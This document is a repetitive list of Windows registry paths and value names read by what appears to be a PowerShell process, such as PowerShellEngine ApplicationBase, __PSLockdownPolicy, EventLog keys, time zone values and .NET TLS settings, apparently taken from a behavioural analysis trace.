HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
ServiceStackVersion
ServiceStackVersion
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
ServiceStackVersion
ServiceStackVersion
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
Mutex
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\v4.0.30319
HKEY_LOCAL_MACHINE
HWRPortReuseOnSocketBind
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.SchSendAuxRecord
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.RequireCertificateEKUs
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\v4.0.30319
HKEY_LOCAL_MACHINE
SchUseStrongCrypto
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\v4.0.30319
HKEY_LOCAL_MACHINE
SchSendAuxRecord
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\v4.0.30319
HKEY_LOCAL_MACHINE
SystemDefaultTlsVersions
WinRegistryKey
